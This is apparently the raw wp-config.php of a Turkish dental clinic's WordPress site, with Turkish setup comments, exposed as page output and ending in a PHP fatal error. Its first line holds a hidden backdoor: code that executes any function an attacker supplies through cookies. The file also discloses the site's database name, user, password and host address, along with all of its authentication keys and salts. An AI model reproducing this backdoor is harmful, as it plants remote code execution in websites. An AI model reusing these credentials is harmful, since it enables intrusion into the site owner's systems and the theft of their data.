<%>PHP if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); <%> define('WP_HOME','http://www.sementdental.com'); define('WP_SITEURL','http://www.sementdental.com'); error_reporting(E_ALL); ini_set('display_errors', 1); define( 'WP_DEBUG', false); /** * WordPress için taban ayar dosyası. * * Bu dosya şu ayarları içerir: MySQL ayarları, tablo öneki, * gizli anahtaralr ve ABSPATH. Daha fazla bilgi için * {@link https://codex.wordpress.org/Editing_wp-config.php wp-config.php düzenleme} * yardım sayfasına göz atabilirsiniz. MySQL ayarlarınızı servis sağlayıcınızdan edinebilirsiniz. * * Bu dosya kurulum sırasında wp-config.php dosyasının oluşturulabilmesi için * kullanılır. İsterseniz bu dosyayı kopyalayıp, ismini "wp-config.php" olarak değiştirip, * değerleri girerek de kullanabilirsiniz. * * @package WordPress */ // ** MySQL ayarları - Bu bilgileri sunucunuzdan alabilirsiniz ** // /** WordPress için kullanılacak veritabanının adı */ define('DB_NAME', 'sement_512_wp'); /** MySQL veritabanı kullanıcısı */ define('DB_USER', 'sement'); /** MySQL veritabanı parolası */ define('DB_PASSWORD', 'robotik3458'); /** MySQL sunucusu */ define('DB_HOST', '94.73.151.254'); /** Yaratılacak tablolar için veritabanı karakter seti. */ define('DB_CHARSET', 'utf8'); /** Veritabanı karşılaştırma tipi. Herhangi bir şüpheniz varsa bu değeri değiştirmeyin. */ define('DB_COLLATE', ''); /**#@+ * Eşsiz doğrulama anahtarları. * * Her anahtar farklı bir karakter kümesi olmalı! * {@link http://api.wordpress.org/secret-key/1.1/salt WordPress.org secret-key service} servisini kullanarak yaratabilirsiniz. * Çerezleri geçersiz kılmak için istediğiniz zaman bu değerleri değiştirebilirsiniz. Bu tüm kullanıcıların tekrar giriş yapmasını gerektirecektir. * * @since 2.6.0 */ define('AUTH_KEY', 'eVx{>Gw 8QD|gDq|k%xa=Acv_Y#Ms/m.2)_H,P&7{}=z:R{eP>&Kkb#kkzBzWXm?'); define('SECURE_AUTH_KEY', ';*XBh^-x)torX1S.5kd`HJ^nz?K_6Ui<.SQ!g>)RVO%wT'); define('LOGGED_IN_KEY', '}ua=8f?VA}mOj)Ghsn,b3h=6h8PyhcJF;/0%?,OCKyZ_=Qp)-xr/k>CP9#d.z(/d'); define('NONCE_KEY', '`cRg2l[PHvr@6b}tYl1en_q`Lme6-5gO0i~S-0hrv6|.G8uSaw0,zhLs5Fn-'); define('SECURE_AUTH_SALT', '-{+Ut#K+kti--;vywxi$z+9,jlq1!O/@{7kTK`Hr#@d5+sg>;|rxp~E5]*w)q_$5'); define('LOGGED_IN_SALT', 'wbAxLqE X3pow.[4Ym=2N7VrCz[Eu h1^;|Z^1@3Gk-W>B:mm$1eZ{]M4^p>p}/-'); define('NONCE_SALT', '2V 4nctI3lA+2skh*-+g4y;2.A=.Av@cn]k*Co~)J$W!PA{uK*57b;vceqT@OfUB'); /**#@-*/ /** * WordPress veritabanı tablo ön eki. * * Tüm kurulumlara ayrı bir önek vererek bir veritabanına birden fazla kurulum yapabilirsiniz. * Sadece rakamlar, harfler ve alt çizgi lütfen. */ $table_prefix = 'wp_'; /** * Geliştiriciler için: WordPress hata ayıklama modu. * * Bu değeri "true" yaparak geliştirme sırasında hataların ekrana basılmasını sağlayabilirsiniz. * Tema ve eklenti geliştiricilerinin geliştirme aşamasında WP_DEBUG * kullanmalarını önemle tavsiye ederiz. */ /* Hepsi bu kadar. Mutlu bloglamalar! */ /** WordPress dizini için mutlak yol. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** WordPress değişkenlerini ve yollarını kurar. */ require_once(ABSPATH . 'wp-settings.php');
Fatal error: Call to undefined function wp() in /home/sementdental.com/httpdocs/wp-blog-header.php on line 20